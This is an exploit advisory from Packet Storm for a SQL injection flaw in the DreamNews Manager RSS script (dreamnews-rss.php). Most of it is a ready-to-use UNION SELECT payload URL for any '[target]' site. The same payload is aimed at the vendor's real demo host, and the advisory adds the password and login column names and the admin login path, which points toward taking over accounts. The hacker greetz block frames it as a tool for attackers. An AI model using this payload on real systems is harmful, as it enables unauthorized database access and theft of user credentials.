The DreamNews Manager is susceptible to a SQL injection vulnerability.
98732797b4dcb4c761bc0e1f76e53fbced654cf7cd8ed204d54367fb1acc1cfd#########################################################
#
# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : http://dreamlevels.com/dreamnews.php
#
# DorK : N/A
#
##########################################################
Exploit:
www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
L!VE DEMO:
http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
column_name :
user_password
user_login
Admin Login :
/admin/
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed